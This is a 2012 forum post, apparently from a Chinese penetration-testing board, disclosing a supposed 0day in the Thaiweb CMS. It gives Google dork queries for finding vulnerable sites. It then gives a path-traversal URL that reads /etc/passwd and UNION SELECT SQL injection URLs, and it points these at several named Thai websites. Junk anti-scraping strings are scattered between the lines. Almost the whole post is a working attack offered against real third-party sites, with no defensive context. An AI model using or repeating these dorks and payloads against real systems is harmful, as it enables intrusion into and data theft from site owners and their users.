中国网络渗透测试联盟
标题:
Thaiweb远程文件sql注入漏洞0day
[打印本页]
作者:
admin
时间:
2012-12-27 08:38
标题:
Thaiweb远程文件sql注入漏洞0day
Google之:
6 z: h$ O6 V: m) N( e! f: N
- P' X) `4 j6 c" p# j4 A5 U
intext:powered by Thaiweb
F( `) L/ o, _8 b6 f" b+ V# L
0 U( y" V) |& R$ S1 ]
inurl:index.php?page=board.php
3 ]! {# y' D y2 X3 C: R/ Q
+ ^8 Z' A) W. Y- b
: G( e7 z. \" e4 p, U) T
8 S$ Y# j/ ?; z" Z! F" j, o h
利用点1:
http://www.xfack.com/index.php?p ... ../../../etc/passwd
: \6 O J* Q' ^9 P5 d
$ d1 u2 C l6 O( `# ]7 U
m8 U- g+ g' W* Z. t5 I q' P
0 ?/ y& ^2 s/ C' u7 D
利用点2:
http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
, j/ Q# E8 K [! A" O& F* d
/ n, j" s/ \8 G7 l
( H$ }( r6 i7 K |
8 W4 y! V: @0 e, F: D% D
http://www.keytasin.com//index.p ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
1 ?9 i7 b! H- U# K* r
( l' Q9 `% k# g/ g3 `9 a
http://www.autopartnerthailand.c ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
8 O3 l; x w$ P: v7 F: V" d
4 l' Z, [+ v. z5 V8 y# a( ~
http://gift.in.th/index.php?page ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
; s7 m9 ^" S. ?$ J! }: T
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2